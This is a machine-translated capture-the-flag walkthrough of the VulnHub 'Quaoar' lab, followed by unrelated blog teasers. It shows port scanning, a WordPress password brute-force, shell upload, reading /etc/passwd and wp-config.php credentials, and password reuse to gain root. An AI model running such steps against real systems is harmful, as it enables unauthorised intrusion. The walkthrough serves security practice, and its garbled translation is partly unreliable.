VulnHub: New series — hackfest2016 Quaoar


All kind time of day. Long time since I put rateapy lab VulnHub. During this time there appeared a small selection of virtual machine images, ready for hacking. In this article we start the analysis of images prepared for the recently held Hackfest CTF 2016 and consider it Quaoar, which you can download here

All, as follows from the description, there is 3 flags:
1. Getting shell access;
2. Elevation of privileges to root.
3. Postexploitation.

A more detailed description you can find on their own, so let's begin.

the

Flag 1


After launching a new path, we kindly tell you the IP address at which it is available:



Therefore immediately proceed to a port scan:

the 
$ sudo nmap-p1-65535 192.168.1.75 -sV

Starting Nmap 7.01 ( nmap.org ) at 2017-04-16 16:26 MSK
Nmap scan report for 192.168.1.75
Host is up (0.00043 s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
110/tcp open pop3?
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3s?
MAC Address: 08:00:27:0A:CA:7B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

In the description it talks about the search directories. Looking for:

the 
$ sudo dirsearch -u http://192.168.1.75/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html -x 403-r-f



Most found this picture in the style of this:

Hidden text


In upload is a website with sehardcore IP person.

the 
$ ./robotscan.py -u http://192.168.1.75/upload/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html x 403



Change ip I'm too lazy, so it'll leave, but in the directory wordpress full-fledged blog. Plus it is referenced and the file robots.txt.

Will see what they say wpscan:

the 
$ sudo ./wpscan.rb --url http://192.168.1.75/wordpress/ --wordlist /usr/share/john/password.lst



Wpscan found the correct password, though he did not understand. Login in the admin area, and go pour a simple shell:



First look at the contents of the /etc/passwd



In the home directory of user wpadmin, find the first flag:



the

Флаг2


Time from admin panel in wordpress the password was the same as the username, you should try the same approach for ssh:

the 
$ ssh wpadmin@192.168.1.75

Putting in the password, wpadmin successfully fail in the shell. Search SUID/SGID files yielded no result. Looking at the configs for the presence of at least some of the passwords, find one interesting:

wpadmin@Quaoar:~$ cat wp-config.php

the 
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

It kollig to connect to the database, but suddenly the password from the uchetki... Check it and +1 flag in the home directory of root:

the 
root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb

the

Флаг3


If the first 2 flags are more or less clear, the third search took too much time. I tried to find another file with the name flag

the 
root@Quaoar:~# find / -name flag.txt
/root/flag.txt
/home/wpadmin/flag.txt
root@Quaoar:~# find / -name flag

But nothing. Attempt to search the contents with the word flag, also to no avail:

the 
root@Quaoar:~# grep -r ' flag is / | less

Ultimately it was decided that once the flag is the MD5 hash, then its probably possible to find using regular expressions. Said, done:
the 
root@Quaoar:~# egrep -r " [a-z0-9]{32,32}" /etc/ 2 > /dev/null
...
/etc/cron.d/php5:# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de

Of course, it would be logical to pre-view your tasks in the cron, but the alternative is also good.

That's about it. All 3 of the flag found. You can proceed to the next level.
Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

ODBC Firebird, Postgresql, executing queries in Powershell

Изображение
Sometimes, system engineers may need to obtain specific data directly from the DBMS by means of Powershell. In this article I want to demonstrate two methods of operating firebird, postgresql through the odbc driver and client library. let's Start with the firebird and work with the database through the ODBC driver, you first need to register in the system client library GDS32.DLL, its bit width should be the same as the ODBC driver which should be installed next, download on the manufacturer's website , be sure during installation you need to tick on the registration of the library. Next install itself ODBC, who also take on the manufacturer's website , do not forget that the bit size should match the bit count of a previously installed client. Now actually have a powershell script, it was based on example in C# for postgresql. the $dbServerName = "localhost:base.gdb" $dbUser = "SYSDBA" $dbPass = "masterkey" [string]$s...
Далее...

Installation LivestreetCMS on MODX Revolution package 10 clicks

Изображение
I have often written about your module modLivestreet for a bunch MODX Revolution + LivestreetCMS (In this Topeka in detail the idea and implementation of schemes, etc.). After almost two weeks since the beginning of the module development, I came to the following conclusion: it is too hard work. The idea itself is simple: MODX Revolution (which historically do not have enough modules for creating blogs) to tie LivestreetCMS in order to get the kind of sociolosko with good functionality. The first package I have thrown fast, and ensures the redirection of queries to Livestreet and output content in MODX. But then I tried to implement the synchronous operation with users of MODX - and LS-., and then something else... In General, the functionality grew, the code is also. The problems manifested in the difficulties settings of this Union. If MODX is possible to say in General, no serious problems have arisen (or at least did not have to touch a single byte code engine), then Lives...
Далее...

The Ministry of communications wants to ban phones without GLONASS

Today in the Ministry of communications submitted the bill , according to which in Russia it will be possible to use only those mobile phones that include support for the GLONASS navigation system. Although it is not clear how this will be monitored, most likely, we are talking about banning the importation and sale. This decision was taken in order, and I quote in order to ensure the stability of the unified telecommunication network of the Russian Federation in various conditions. Requirements (in the case of the adoption of this act) will apply to manufacturers and sellers. To monitor the implementation of law be entrusted to Roskomnadzor. How has this come? For me personally this news is not very surprising (and not only because this is another project state silly the Duma), not so long ago there was another similar initiative, the essence of which was to translate public transport to use the system "To the end of the year practically the whole of Moscow is covered ...
Далее...